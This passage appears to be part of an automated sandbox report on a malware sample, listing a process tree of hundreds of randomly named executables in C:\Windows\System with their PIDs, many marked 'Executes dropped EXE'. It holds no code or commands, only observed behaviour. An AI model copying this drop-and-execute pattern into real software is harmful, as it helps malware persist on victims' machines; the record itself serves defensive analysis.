  PID:744
- C:\Windows\System\FThmAqn.exe
  C:\Windows\System\FThmAqn.exe
  2⤵
  - Executes dropped EXE
  PID:5000
- C:\Windows\System\QZKMyYk.exe
  C:\Windows\System\QZKMyYk.exe
  2⤵
  - Executes dropped EXE
  PID:2676
- C:\Windows\System\rjDCHFc.exe
  C:\Windows\System\rjDCHFc.exe
  2⤵
  - Executes dropped EXE
  PID:2516
- C:\Windows\System\APPjUkq.exe
  C:\Windows\System\APPjUkq.exe
  2⤵
  - Executes dropped EXE
  PID:1624
- C:\Windows\System\WvcIuUY.exe
  C:\Windows\System\WvcIuUY.exe
  2⤵
  - Executes dropped EXE
  PID:1544
- C:\Windows\System\cujJRUE.exe
  C:\Windows\System\cujJRUE.exe
  2⤵
  - Executes dropped EXE
  PID:4788
- C:\Windows\System\FDEBrfR.exe
  C:\Windows\System\FDEBrfR.exe
  2⤵
  - Executes dropped EXE
  PID:2328
- C:\Windows\System\chtCkBO.exe
  C:\Windows\System\chtCkBO.exe
  2⤵
  - Executes dropped EXE
  PID:4800
- C:\Windows\System\fNdukWq.exe
  C:\Windows\System\fNdukWq.exe
  2⤵
  - Executes dropped EXE
  PID:2432
- C:\Windows\System\KlwVmoW.exe
  C:\Windows\System\KlwVmoW.exe
  2⤵
  - Executes dropped EXE
  PID:1516
- C:\Windows\System\RCjkzJf.exe
  C:\Windows\System\RCjkzJf.exe
  2⤵
  - Executes dropped EXE
  PID:2592
- C:\Windows\System\njIofWP.exe
  C:\Windows\System\njIofWP.exe
  2⤵
  - Executes dropped EXE
  PID:652
- C:\Windows\System\PRBItAp.exe
  C:\Windows\System\PRBItAp.exe
  2⤵
  - Executes dropped EXE
  PID:1048
- C:\Windows\System\GTeGwPd.exe
  C:\Windows\System\GTeGwPd.exe
  2⤵
  - Executes dropped EXE
  PID:4580
- C:\Windows\System\WnXAFff.exe
  C:\Windows\System\WnXAFff.exe
  2⤵
  - Executes dropped EXE
  PID:3328
- C:\Windows\System\iuQjgaT.exe
  C:\Windows\System\iuQjgaT.exe
  2⤵
  - Executes dropped EXE
  PID:1144
- C:\Windows\System\iQkIhMY.exe
  C:\Windows\System\iQkIhMY.exe
  2⤵
  - Executes dropped EXE
  PID:5016
- C:\Windows\System\ESSWbPL.exe
  C:\Windows\System\ESSWbPL.exe
  2⤵
  - Executes dropped EXE
  PID:964
- C:\Windows\System\qBMANUO.exe
  C:\Windows\System\qBMANUO.exe
  2⤵
  - Executes dropped EXE
  PID:1736
- C:\Windows\System\NQzumPb.exe
  C:\Windows\System\NQzumPb.exe
  2⤵
  - Executes dropped EXE
  PID:4828
- C:\Windows\System\JGyuVDy.exe
  C:\Windows\System\JGyuVDy.exe
  2⤵
  - Executes dropped EXE
  PID:1564
- C:\Windows\System\KMcSPRC.exe
  C:\Windows\System\KMcSPRC.exe
  2⤵
  - Executes dropped EXE
  PID:1152
- C:\Windows\System\DgSJSaS.exe
  C:\Windows\System\DgSJSaS.exe
  2⤵
  - Executes dropped EXE
  PID:1796
- C:\Windows\System\CIKXNUz.exe
  C:\Windows\System\CIKXNUz.exe
  2⤵
  - Executes dropped EXE
  PID:1556
- C:\Windows\System\gNOEFEh.exe
  C:\Windows\System\gNOEFEh.exe
  2⤵
  - Executes dropped EXE
  PID:2648
- C:\Windows\System\VYNGHPc.exe
  C:\Windows\System\VYNGHPc.exe
  2⤵
  - Executes dropped EXE
  PID:4092
- C:\Windows\System\IQfNsLc.exe
  C:\Windows\System\IQfNsLc.exe
  2⤵
  - Executes dropped EXE
  PID:1916
- C:\Windows\System\aagHqgy.exe
  C:\Windows\System\aagHqgy.exe
  2⤵
  - Executes dropped EXE
  PID:3464
- C:\Windows\System\MXyMjKP.exe
  C:\Windows\System\MXyMjKP.exe
  2⤵
  - Executes dropped EXE
  PID:2980
- C:\Windows\System\mRgSstU.exe
  C:\Windows\System\mRgSstU.exe
  2⤵
  - Executes dropped EXE
  PID:5044
- C:\Windows\System\gQxSeIx.exe
  C:\Windows\System\gQxSeIx.exe
  2⤵
  - Executes dropped EXE
  PID:3812
- C:\Windows\System\DrwutEO.exe
  C:\Windows\System\DrwutEO.exe
  2⤵
  - Executes dropped EXE
  PID:4040
- C:\Windows\System\btSAfEt.exe
  C:\Windows\System\btSAfEt.exe
  2⤵
  - Executes dropped EXE
  PID:2752
- C:\Windows\System\gVmcoXX.exe
  C:\Windows\System\gVmcoXX.exe
  2⤵
  - Executes dropped EXE
  PID:4504
- C:\Windows\System\lXyRrvj.exe
  C:\Windows\System\lXyRrvj.exe
  2⤵
  - Executes dropped EXE
  PID:2480
- C:\Windows\System\jcWyaoL.exe
  C:\Windows\System\jcWyaoL.exe
  2⤵
  - Executes dropped EXE
  PID:4312
- C:\Windows\System\bmPLtqC.exe
  C:\Windows\System\bmPLtqC.exe
  2⤵
  - Executes dropped EXE
  PID:2932
- C:\Windows\System\KEudmQC.exe
  C:\Windows\System\KEudmQC.exe
  2⤵
  - Executes dropped EXE
  PID:3356
- C:\Windows\System\FDXomWk.exe
  C:\Windows\System\FDXomWk.exe
  2⤵
  - Executes dropped EXE
  PID:1364
- C:\Windows\System\dWwqtcl.exe
  C:\Windows\System\dWwqtcl.exe
  2⤵
  - Executes dropped EXE
  PID:3108
- C:\Windows\System\BLICWth.exe
  C:\Windows\System\BLICWth.exe
  2⤵
  - Executes dropped EXE
  PID:4524
- C:\Windows\System\GThlAQs.exe
  C:\Windows\System\GThlAQs.exe
  2⤵
  - Executes dropped EXE
  PID:5032
- C:\Windows\System\zANYdbY.exe
  C:\Windows\System\zANYdbY.exe
  2⤵
  - Executes dropped EXE
  PID:3884
- C:\Windows\System\wqdNaZS.exe
  C:\Windows\System\wqdNaZS.exe
  2⤵
  - Executes dropped EXE
  PID:5108
- C:\Windows\System\JvRxCkB.exe
  C:\Windows\System\JvRxCkB.exe
  2⤵
  - Executes dropped EXE
  PID:3304
- C:\Windows\System\eIoNVwL.exe
  C:\Windows\System\eIoNVwL.exe
  2⤵
  - Executes dropped EXE
  PID:3216
- C:\Windows\System\AySvMsW.exe
  C:\Windows\System\AySvMsW.exe
  2⤵
  - Executes dropped EXE
  PID:4216
- C:\Windows\System\kMMyedp.exe
  C:\Windows\System\kMMyedp.exe
  2⤵
  - Executes dropped EXE
  PID:1212
- C:\Windows\System\AyfFcJG.exe
  C:\Windows\System\AyfFcJG.exe
  2⤵
  - Executes dropped EXE
  PID:2268
- C:\Windows\System\dImddHs.exe
  C:\Windows\System\dImddHs.exe
  2⤵
  - Executes dropped EXE
  PID:3332
- C:\Windows\System\EXRgBQe.exe
  C:\Windows\System\EXRgBQe.exe
  2⤵
  - Executes dropped EXE
  PID:3280
- C:\Windows\System\ZKtiBMh.exe
  C:\Windows\System\ZKtiBMh.exe
  2⤵
  - Executes dropped EXE
  PID:4420
- C:\Windows\System\OLGZxLP.exe
  C:\Windows\System\OLGZxLP.exe
  2⤵
  - Executes dropped EXE
  PID:1852
- C:\Windows\System\UiVpwwv.exe
  C:\Windows\System\UiVpwwv.exe
  2⤵
  - Executes dropped EXE
  PID:808
- C:\Windows\System\pUfBEVo.exe
  C:\Windows\System\pUfBEVo.exe
  2⤵
  - Executes dropped EXE
  PID:4048
- C:\Windows\System\XpMRezg.exe
  C:\Windows\System\XpMRezg.exe
  2⤵
  - Executes dropped EXE
  PID:4996
- C:\Windows\System\UOBKtae.exe
  C:\Windows\System\UOBKtae.exe
  2⤵
  - Executes dropped EXE
  PID:2396
- C:\Windows\System\LXKnbwJ.exe
  C:\Windows\System\LXKnbwJ.exe
  2⤵
  PID:2780
- C:\Windows\System\QfDMMJe.exe
  C:\Windows\System\QfDMMJe.exe
  2⤵
  PID:4792
- C:\Windows\System\EkvjcuU.exe
  C:\Windows\System\EkvjcuU.exe
  2⤵
  PID:4528
- C:\Windows\System\DoKKohp.exe
  C:\Windows\System\DoKKohp.exe
  2⤵
  PID:3496
- C:\Windows\System\kCSIAtd.exe
  C:\Windows\System\kCSIAtd.exe
  2⤵
  PID:3604
- C:\Windows\System\TcsvWeT.exe
  C:\Windows\System\TcsvWeT.exe
  2⤵
  PID:5132
- C:\Windows\System\GwtJdDD.exe
  C:\Windows\System\GwtJdDD.exe
  2⤵
  PID:5164
- C:\Windows\System\sWefGju.exe
  C:\Windows\System\sWefGju.exe
  2⤵
  PID:5188
- C:\Windows\System\afOEUKE.exe
  C:\Windows\System\afOEUKE.exe
  2⤵
  PID:5216
- C:\Windows\System\ZMXrGtc.exe
  C:\Windows\System\ZMXrGtc.exe
  2⤵
  PID:5244
- C:\Windows\System\fDJaBBZ.exe
  C:\Windows\System\fDJaBBZ.exe
  2⤵
  PID:5272
- C:\Windows\System\zZCwFHl.exe
  C:\Windows\System\zZCwFHl.exe
  2⤵
  PID:5300
- C:\Windows\System\FLGwFvw.exe
  C:\Windows\System\FLGwFvw.exe
  2⤵
  PID:5328
- C:\Windows\System\mdrksNM.exe
  C:\Windows\System\mdrksNM.exe
  2⤵
  PID:5356
- C:\Windows\System\ovZBFqn.exe
  C:\Windows\System\ovZBFqn.exe
  2⤵
  PID:5384
- C:\Windows\System\RykSGvi.exe
  C:\Windows\System\RykSGvi.exe
  2⤵
  PID:5408
- C:\Windows\System\apUyqzF.exe
  C:\Windows\System\apUyqzF.exe
  2⤵
  PID:5440
- C:\Windows\System\xkJXAds.exe
  C:\Windows\System\xkJXAds.exe
  2⤵
  PID:5472
- C:\Windows\System\ESwDAVb.exe
  C:\Windows\System\ESwDAVb.exe
  2⤵
  PID:5496
- C:\Windows\System\ivwvmOI.exe
  C:\Windows\System\ivwvmOI.exe
  2⤵
  PID:5524
- C:\Windows\System\AZyXBbA.exe
  C:\Windows\System\AZyXBbA.exe
  2⤵
  PID:5552
- C:\Windows\System\xknwGnc.exe
  C:\Windows\System\xknwGnc.exe
  2⤵
  PID:5580
- C:\Windows\System\TQKqryU.exe
  C:\Windows\System\TQKqryU.exe
  2⤵
  PID:5608
- C:\Windows\System\foGMesN.exe
  C:\Windows\System\foGMesN.exe
  2⤵
  PID:5636
- C:\Windows\System\tfBsILG.exe
  C:\Windows\System\tfBsILG.exe
  2⤵
  PID:5664
- C:\Windows\System\HbqFzIW.exe
  C:\Windows\System\HbqFzIW.exe
  2⤵
  PID:5692
- C:\Windows\System\bOAprIl.exe
  C:\Windows\System\bOAprIl.exe
  2⤵
  PID:5720
- C:\Windows\System\ojDMvkN.exe
  C:\Windows\System\ojDMvkN.exe
  2⤵
  PID:5748
- C:\Windows\System\eWtQSkU.exe
  C:\Windows\System\eWtQSkU.exe
  2⤵
  PID:5776
- C:\Windows\System\LVwdvev.exe
  C:\Windows\System\LVwdvev.exe
  2⤵
  PID:5804
- C:\Windows\System\ksaPRWB.exe
  C:\Windows\System\ksaPRWB.exe
  2⤵
  PID:5832
- C:\Windows\System\MlPSZwa.exe
  C:\Windows\System\MlPSZwa.exe
  2⤵
  PID:5860
- C:\Windows\System\WwUNpNW.exe
  C:\Windows\System\WwUNpNW.exe
  2⤵
  PID:5888
- C:\Windows\System\pkwtqdB.exe
  C:\Windows\System\pkwtqdB.exe
  2⤵
  PID:5916
- C:\Windows\System\XyitdfQ.exe
  C:\Windows\System\XyitdfQ.exe
  2⤵
  PID:5944
- C:\Windows\System\JTvnbIs.exe
  C:\Windows\System\JTvnbIs.exe
  2⤵
  PID:5972
- C:\Windows\System\HpTfdhK.exe
  C:\Windows\System\HpTfdhK.exe
  2⤵
  PID:6000
- C:\Windows\System\rNQBwHy.exe
  C:\Windows\System\rNQBwHy.exe
  2⤵
  PID:6028
- C:\Windows\System\VVSAmgE.exe
  C:\Windows\System\VVSAmgE.exe
  2⤵
  PID:6056
- C:\Windows\System\xowNJCG.exe
  C:\Windows\System\xowNJCG.exe
  2⤵
  PID:6084
- C:\Windows\System\GIQVHWb.exe
  C:\Windows\System\GIQVHWb.exe
  2⤵
  PID:6112
- C:\Windows\System\kNlIbKI.exe
  C:\Windows\System\kNlIbKI.exe
  2⤵
  PID:6140
- C:\Windows\System\rVvfZoP.exe
  C:\Windows\System\rVvfZoP.exe
  2⤵
  PID:4952
- C:\Windows\System\LNAPNbT.exe
  C:\Windows\System\LNAPNbT.exe
  2⤵
  PID:232
- C:\Windows\System\udDAKwI.exe
  C:\Windows\System\udDAKwI.exe
  2⤵
  PID:572
- C:\Windows\System\BaVkliR.exe
  C:\Windows\System\BaVkliR.exe
  2⤵
  PID:1236
- C:\Windows\System\OuLJldX.exe
  C:\Windows\System\OuLJldX.exe
  2⤵
  PID:5144
- C:\Windows\System\oVXAqBi.exe
  C:\Windows\System\oVXAqBi.exe
  2⤵
  PID:5208
- C:\Windows\System\NJBlgLA.exe
  C:\Windows\System\NJBlgLA.exe
  2⤵
  PID:5284
- C:\Windows\System\DtQaaob.exe
  C:\Windows\System\DtQaaob.exe
  2⤵
  PID:5344
- C:\Windows\System\QtWVKlE.exe
  C:\Windows\System\QtWVKlE.exe
  2⤵
  PID:5404
- C:\Windows\System\SvUGyBe.exe
  C:\Windows\System\SvUGyBe.exe
  2⤵
  PID:5480
- C:\Windows\System\pjTTxum.exe
  C:\Windows\System\pjTTxum.exe
  2⤵
  PID:5536
- C:\Windows\System\ZNGfEoR.exe
  C:\Windows\System\ZNGfEoR.exe
  2⤵
  PID:5600
- C:\Windows\System\JOYeKDu.exe
  C:\Windows\System\JOYeKDu.exe
  2⤵
  PID:5656
- C:\Windows\System\MyfZBCJ.exe
  C:\Windows\System\MyfZBCJ.exe
  2⤵
  PID:5736
- C:\Windows\System\qeDoIRb.exe
  C:\Windows\System\qeDoIRb.exe
  2⤵
  PID:5796
- C:\Windows\System\rzLPizW.exe
  C:\Windows\System\rzLPizW.exe
  2⤵
  PID:5872
- C:\Windows\System\kOtDQkj.exe
  C:\Windows\System\kOtDQkj.exe
  2⤵
  PID:5932
- C:\Windows\System\xxFjUGy.exe
  C:\Windows\System\xxFjUGy.exe
  2⤵
  PID:5988
- C:\Windows\System\LjUmnfg.exe
  C:\Windows\System\LjUmnfg.exe
  2⤵
  PID:6048
- C:\Windows\System\suHTaKh.exe
  C:\Windows\System\suHTaKh.exe
  2⤵
  PID:6124
- C:\Windows\System\KnIAdwH.exe
  C:\Windows\System\KnIAdwH.exe
  2⤵
  PID:4500
- C:\Windows\System\EvMqrkb.exe
  C:\Windows\System\EvMqrkb.exe
  2⤵
  PID:3692
- C:\Windows\System\VeWqnRt.exe
  C:\Windows\System\VeWqnRt.exe
  2⤵
  PID:5200
- C:\Windows\System\IWaMqTq.exe
  C:\Windows\System\IWaMqTq.exe
  2⤵
  PID:5372
- C:\Windows\System\bQOevhc.exe
  C:\Windows\System\bQOevhc.exe
  2⤵
  PID:5512
- C:\Windows\System\RjLcDIL.exe
  C:\Windows\System\RjLcDIL.exe
  2⤵
  PID:5652
- C:\Windows\System\uzonjLE.exe
  C:\Windows\System\uzonjLE.exe
  2⤵
  PID:5824
- C:\Windows\System\ADrpXMa.exe
  C:\Windows\System\ADrpXMa.exe
  2⤵
  PID:6172
- C:\Windows\System\vnxFCkZ.exe
  C:\Windows\System\vnxFCkZ.exe
  2⤵
  PID:6200
- C:\Windows\System\RQZEgpp.exe
  C:\Windows\System\RQZEgpp.exe
  2⤵
  PID:6228
- C:\Windows\System\sPXOkzX.exe
  C:\Windows\System\sPXOkzX.exe
  2⤵
  PID:6252
- C:\Windows\System\tgZEMeC.exe
  C:\Windows\System\tgZEMeC.exe
  2⤵
  PID:6284
- C:\Windows\System\zXJRyAl.exe
  C:\Windows\System\zXJRyAl.exe
  2⤵
  PID:6312
- C:\Windows\System\XNpdNBY.exe
  C:\Windows\System\XNpdNBY.exe
  2⤵
  PID:6340
- C:\Windows\System\oDcaxwl.exe
  C:\Windows\System\oDcaxwl.exe
  2⤵
  PID:6368
- C:\Windows\System\mtrEgfB.exe
  C:\Windows\System\mtrEgfB.exe
  2⤵
  PID:6396
- C:\Windows\System\HFAOwmW.exe
  C:\Windows\System\HFAOwmW.exe
  2⤵
  PID:6424
- C:\Windows\System\pdzeAuz.exe
  C:\Windows\System\pdzeAuz.exe
  2⤵
  PID:6456
- C:\Windows\System\KNQpBQy.exe
  C:\Windows\System\KNQpBQy.exe
  2⤵
  PID:6480
- C:\Windows\System\oENqVHW.exe
  C:\Windows\System\oENqVHW.exe
  2⤵
  PID:6508
- C:\Windows\System\ABTbEeX.exe
  C:\Windows\System\ABTbEeX.exe
  2⤵
  PID:6536
- C:\Windows\System\pjLvaHG.exe
  C:\Windows\System\pjLvaHG.exe
  2⤵
  PID:6564
- C:\Windows\System\oqBDfEX.exe
  C:\Windows\System\oqBDfEX.exe
  2⤵
  PID:6592
- C:\Windows\System\YZLTZCR.exe
  C:\Windows\System\YZLTZCR.exe
  2⤵
  PID:6620
- C:\Windows\System\QXQujVV.exe
  C:\Windows\System\QXQujVV.exe
  2⤵
  PID:6648
- C:\Windows\System\ebYMHVG.exe
  C:\Windows\System\ebYMHVG.exe
  2⤵
  PID:6676
- C:\Windows\System\KGwDbab.exe
  C:\Windows\System\KGwDbab.exe
  2⤵
  PID:6700
- C:\Windows\System\XlTutmS.exe
  C:\Windows\System\XlTutmS.exe
  2⤵
  PID:6732
- C:\Windows\System\HTLwAXo.exe
  C:\Windows\System\HTLwAXo.exe
  2⤵
  PID:6760
- C:\Windows\System\rOovLcs.exe
  C:\Windows\System\rOovLcs.exe
  2⤵
  PID:6788
- C:\Windows\System\frpdVYL.exe
  C:\Windows\System\frpdVYL.exe
  2⤵
  PID:6816
- C:\Windows\System\ywtXuVu.exe
  C:\Windows\System\ywtXuVu.exe
  2⤵
  PID:6844
- C:\Windows\System\ZoPkmym.exe
  C:\Windows\System\ZoPkmym.exe
  2⤵
  PID:6872
- C:\Windows\System\FxuIZlo.exe
  C:\Windows\System\FxuIZlo.exe
  2⤵
  PID:6900
- C:\Windows\System\ilDmbRn.exe
  C:\Windows\System\ilDmbRn.exe
  2⤵
  PID:6928
- C:\Windows\System\oMspYLT.exe
  C:\Windows\System\oMspYLT.exe
  2⤵
  PID:6956
- C:\Windows\System\cKzcQHS.exe
  C:\Windows\System\cKzcQHS.exe
  2⤵
  PID:6984
- C:\Windows\System\iZfIZyP.exe
  C:\Windows\System\iZfIZyP.exe
  2⤵
  PID:7012
- C:\Windows\System\ycUPGbt.exe
  C:\Windows\System\ycUPGbt.exe
  2⤵
  PID:7036
- C:\Windows\System\STPRvVK.exe
  C:\Windows\System\STPRvVK.exe
  2⤵
  PID:7068
- C:\Windows\System\WhsUnjx.exe
  C:\Windows\System\WhsUnjx.exe
  2⤵
  PID:7096
- C:\Windows\System\YBRHSMk.exe
  C:\Windows\System\YBRHSMk.exe
  2⤵
  PID:7124
- C:\Windows\System\PELcwxV.exe
  C:\Windows\System\PELcwxV.exe
  2⤵
  PID:7152
- C:\Windows\System\BjLfzqK.exe
  C:\Windows\System\BjLfzqK.exe
  2⤵
  PID:5904
- C:\Windows\System\cyjssxD.exe
  C:\Windows\System\cyjssxD.exe
  2⤵
  PID:6044
- C:\Windows\System\nVOmuyV.exe
  C:\Windows\System\nVOmuyV.exe
  2⤵
  PID:1120
- C:\Windows\System\glqymhn.exe
  C:\Windows\System\glqymhn.exe
  2⤵
  PID:5316
- C:\Windows\System\ZmKpxtu.exe
  C:\Windows\System\ZmKpxtu.exe
  2⤵
  PID:5628
- C:\Windows\System\jPgNfkz.exe
  C:\Windows\System\jPgNfkz.exe
  2⤵
  PID:6184
- C:\Windows\System\UaRqtLv.exe
  C:\Windows\System\UaRqtLv.exe
  2⤵
  PID:6244
- C:\Windows\System\qZCilIv.exe
  C:\Windows\System\qZCilIv.exe
  2⤵
  PID:6304
- C:\Windows\System\AhdFfiQ.exe
  C:\Windows\System\AhdFfiQ.exe
  2⤵
  PID:6360
- C:\Windows\System\qDvkFfC.exe
  C:\Windows\System\qDvkFfC.exe
  2⤵
  PID:6440
- C:\Windows\System\zFEytep.exe
  C:\Windows\System\zFEytep.exe
  2⤵
  PID:6500
- C:\Windows\System\FiJeIyu.exe
  C:\Windows\System\FiJeIyu.exe
  2⤵
  PID:6576
- C:\Windows\System\SxPIuGf.exe
  C:\Windows\System\SxPIuGf.exe
  2⤵
  PID:6636
- C:\Windows\System\dhRfjoZ.exe
  C:\Windows\System\dhRfjoZ.exe
  2⤵
  PID:6692
- C:\Windows\System\CUxBanZ.exe
  C:\Windows\System\CUxBanZ.exe
  2⤵
  PID:6752
- C:\Windows\System\ipEpctQ.exe
  C:\Windows\System\ipEpctQ.exe
  2⤵
  PID:6828
- C:\Windows\System\DSjmdnf.exe
  C:\Windows\System\DSjmdnf.exe
  2⤵
  PID:6888
- C:\Windows\System\xxvMOJa.exe
  C:\Windows\System\xxvMOJa.exe
  2⤵
  PID:6920
- C:\Windows\System\jFwXJbD.exe
  C:\Windows\System\jFwXJbD.exe
  2⤵
  PID:7004
- C:\Windows\System\DUJfKwx.exe
  C:\Windows\System\DUJfKwx.exe
  2⤵
  PID:7060
- C:\Windows\System\nRDCWrY.exe
  C:\Windows\System\nRDCWrY.exe
  2⤵
  PID:7136
- C:\Windows\System\dqKBJwR.exe
  C:\Windows\System\dqKBJwR.exe
  2⤵
  PID:5964
- C:\Windows\System\GIviEsm.exe
  C:\Windows\System\GIviEsm.exe
  2⤵
  PID:3728
- C:\Windows\System\vZmeddz.exe
  C:\Windows\System\vZmeddz.exe
  2⤵
  PID:6156
- C:\Windows\System\OtXIsym.exe
  C:\Windows\System\OtXIsym.exe
  2⤵
  PID:6276
- C:\Windows\System\XjcoCeN.exe
  C:\Windows\System\XjcoCeN.exe
  2⤵
  PID:6412
- C:\Windows\System\soYIoJc.exe
  C:\Windows\System\soYIoJc.exe
  2⤵
  PID:6552
- C:\Windows\System\CcgNuHK.exe
  C:\Windows\System\CcgNuHK.exe
  2⤵
  PID:6744
- C:\Windows\System\dXfZBhb.exe
  C:\Windows\System\dXfZBhb.exe
  2⤵
  PID:6864
- C:\Windows\System\VYziZNd.exe
  C:\Windows\System\VYziZNd.exe
  2⤵
  PID:6996
- C:\Windows\System\jpDFBgl.exe
  C:\Windows\System\jpDFBgl.exe
  2⤵
  PID:3232
- C:\Windows\System\ZzsKWrF.exe
  C:\Windows\System\ZzsKWrF.exe
  2⤵
  PID:6020
- C:\Windows\System\bfCFOhc.exe
  C:\Windows\System\bfCFOhc.exe
  2⤵
  PID:7188
- C:\Windows\System\FdkYOrN.exe
  C:\Windows\System\FdkYOrN.exe
  2⤵
  PID:7216
- C:\Windows\System\jNtJEGC.exe
  C:\Windows\System\jNtJEGC.exe
  2⤵
  PID:7244
- C:\Windows\System\RuVQJBO.exe
  C:\Windows\System\RuVQJBO.exe
  2⤵
  PID:7272
- C:\Windows\System\ulDbRDM.exe
  C:\Windows\System\ulDbRDM.exe
  2⤵
  PID:7300
- C:\Windows\System\ygdlJUb.exe
  C:\Windows\System\ygdlJUb.exe
  2⤵
  PID:7328
- C:\Windows\System\moEeRiJ.exe
  C:\Windows\System\moEeRiJ.exe
  2⤵
  PID:7356
- C:\Windows\System\CTVKpFC.exe
  C:\Windows\System\CTVKpFC.exe
  2⤵
  PID:7384
- C:\Windows\System\wUwFBZo.exe
  C:\Windows\System\wUwFBZo.exe
  2⤵
  PID:7412
- C:\Windows\System\RqNevMs.exe
  C:\Windows\System\RqNevMs.exe
  2⤵
  PID:7440
- C:\Windows\System\LjYerPP.exe
  C:\Windows\System\LjYerPP.exe
  2⤵
  PID:7468
- C:\Windows\System\BbmofuX.exe
  C:\Windows\System\BbmofuX.exe
  2⤵
  PID:7496
- C:\Windows\System\jAFvCsX.exe
  C:\Windows\System\jAFvCsX.exe
  2⤵
  PID:7524
- C:\Windows\System\sygdhYP.exe
  C:\Windows\System\sygdhYP.exe
  2⤵
  PID:7552
- C:\Windows\System\HBrxDAp.exe
  C:\Windows\System\HBrxDAp.exe
  2⤵
  PID:7580
- C:\Windows\System\SVXNAAc.exe
  C:\Windows\System\SVXNAAc.exe
  2⤵
  PID:7608
- C:\Windows\System\HKCPjdw.exe
  C:\Windows\System\HKCPjdw.exe
  2⤵
  PID:7636
- C:\Windows\System\gLJMQfn.exe
  C:\Windows\System\gLJMQfn.exe
  2⤵
  PID:7664
- C:\Windows\System\amWQtPw.exe
  C:\Windows\System\amWQtPw.exe
  2⤵
  PID:7692
- C:\Windows\System\WnLeXJq.exe
  C:\Windows\System\WnLeXJq.exe
  2⤵
  PID:7720
- C:\Windows\System\gHIjacR.exe
  C:\Windows\System\gHIjacR.exe
  2⤵
  PID:7748
- C:\Windows\System\CygQhiB.exe
  C:\Windows\System\CygQhiB.exe
  2⤵
  PID:7776
- C:\Windows\System\YLYaEgL.exe
  C:\Windows\System\YLYaEgL.exe
  2⤵
  PID:7804
- C:\Windows\System\ZDMKDJT.exe
  C:\Windows\System\ZDMKDJT.exe
  2⤵
  PID:7832
- C:\Windows\System\QCPNNbi.exe
  C:\Windows\System\QCPNNbi.exe
  2⤵
  PID:7860
- C:\Windows\System\AUSWyQd.exe
  C:\Windows\System\AUSWyQd.exe
  2⤵
  PID:7888
- C:\Windows\System\OoBnEbK.exe
  C:\Windows\System\OoBnEbK.exe
  2⤵
  PID:7916
- C:\Windows\System\TisADBI.exe
  C:\Windows\System\TisADBI.exe
  2⤵
  PID:7944
- C:\Windows\System\VKLUoGw.exe
  C:\Windows\System\VKLUoGw.exe
  2⤵
  PID:7972
- C:\Windows\System\jCcWPyc.exe
  C:\Windows\System\jCcWPyc.exe
  2⤵
  PID:8000
- C:\Windows\System\tKkMcMG.exe
  C:\Windows\System\tKkMcMG.exe
  2⤵
  PID:8028
- C:\Windows\System\lVrFOre.exe
  C:\Windows\System\lVrFOre.exe
  2⤵
  PID:8056
- C:\Windows\System\HvPOLrU.exe
  C:\Windows\System\HvPOLrU.exe
  2⤵
  PID:8084
- C:\Windows\System\vypKKLT.exe
  C:\Windows\System\vypKKLT.exe
  2⤵
  PID:8112
- C:\Windows\System\auUnFVb.exe
  C:\Windows\System\auUnFVb.exe
  2⤵
  PID:8136
- C:\Windows\System\LgokGYa.exe
  C:\Windows\System\LgokGYa.exe
  2⤵
  PID:8168
- C:\Windows\System\YfhBbrF.exe
  C:\Windows\System\YfhBbrF.exe
  2⤵
  PID:5572
- C:\Windows\System\whczCzK.exe
  C:\Windows\System\whczCzK.exe
  2⤵
  PID:6352
- C:\Windows\System\zDZcsBM.exe
  C:\Windows\System\zDZcsBM.exe
  2⤵
  PID:6724
- C:\Windows\System\sBrWgAo.exe
  C:\Windows\System\sBrWgAo.exe
  2⤵
  PID:208
- C:\Windows\System\LANRzlE.exe
  C:\Windows\System\LANRzlE.exe
  2⤵
  PID:7316
- C:\Windows\System\GoyUpBC.exe
  C:\Windows\System\GoyUpBC.exe
  2⤵
  PID:3076
- C:\Windows\System\LUpUZGL.exe
  C:\Windows\System\LUpUZGL.exe
  2⤵
  PID:7432
- C:\Windows\System\QYuMeqa.exe
  C:\Windows\System\QYuMeqa.exe
  2⤵
  PID:4584
- C:\Windows\System\regntkT.exe
  C:\Windows\System\regntkT.exe
  2⤵
  PID:7460
- C:\Windows\System\BGTXagX.exe
  C:\Windows\System\BGTXagX.exe
  2⤵
  PID:7512
- C:\Windows\System\RJeSCqB.exe
  C:\Windows\System\RJeSCqB.exe
  2⤵
  PID:7572
- C:\Windows\System\GWOMVpQ.exe
  C:\Windows\System\GWOMVpQ.exe
  2⤵
  PID:7704
- C:\Windows\System\lgtmFEA.exe
  C:\Windows\System\lgtmFEA.exe
  2⤵
  PID:7844
- C:\Windows\System\vOkOdHa.exe
  C:\Windows\System\vOkOdHa.exe
  2⤵
  PID:7876
- C:\Windows\System\SFJafYb.exe
  C:\Windows\System\SFJafYb.exe
  2⤵
  PID:7900
- C:\Windows\System\YbhJEWv.exe
  C:\Windows\System\YbhJEWv.exe
  2⤵
  PID:7960
- C:\Windows\System\miIjTzp.exe
  C:\Windows\System\miIjTzp.exe
  2⤵
  PID:7992
- C:\Windows\System\kfDsrAe.exe
  C:\Windows\System\kfDsrAe.exe
  2⤵
  PID:8020
- C:\Windows\System\uVwjlNw.exe
  C:\Windows\System\uVwjlNw.exe
  2⤵
  PID:2680
- C:\Windows\System\MmWVQAv.exe
  C:\Windows\System\MmWVQAv.exe
  2⤵
  PID:2228
- C:\Windows\System\FLXoNef.exe
  C:\Windows\System\FLXoNef.exe
  2⤵
  PID:2928
- C:\Windows\System\dtNzYMz.exe
  C:\Windows\System\dtNzYMz.exe
  2⤵
  PID:6220
- C:\Windows\System\qJKCeeM.exe
  C:\Windows\System\qJKCeeM.exe
  2⤵
  PID:4368
- C:\Windows\System\gHwIxwi.exe
  C:\Windows\System\gHwIxwi.exe
  2⤵
  PID:7144
- C:\Windows\System\yNQnJav.exe
  C:\Windows\System\yNQnJav.exe
  2⤵
  PID:4004
- C:\Windows\System\uhYBdlD.exe
  C:\Windows\System\uhYBdlD.exe
  2⤵
  PID:7452
- C:\Windows\System\uNUXmEm.exe
  C:\Windows\System\uNUXmEm.exe
  2⤵
  PID:7740
- C:\Windows\System\SQyRBXN.exe
  C:\Windows\System\SQyRBXN.exe
  2⤵
  PID:7456
- C:\Windows\System\aJFqvxn.exe
  C:\Windows\System\aJFqvxn.exe
  2⤵
  PID:7824
- C:\Windows\System\BPaUiAu.exe
  C:\Windows\System\BPaUiAu.exe
  2⤵
  PID:4824
- C:\Windows\System\OXqPfqD.exe
  C:\Windows\System\OXqPfqD.exe
  2⤵
  PID:7508
- C:\Windows\System\LVEOkwI.exe
  C:\Windows\System\LVEOkwI.exe
  2⤵
  PID:8048
- C:\Windows\System\VvIUnDT.exe
  C:\Windows\System\VvIUnDT.exe
  2⤵
  PID:1944
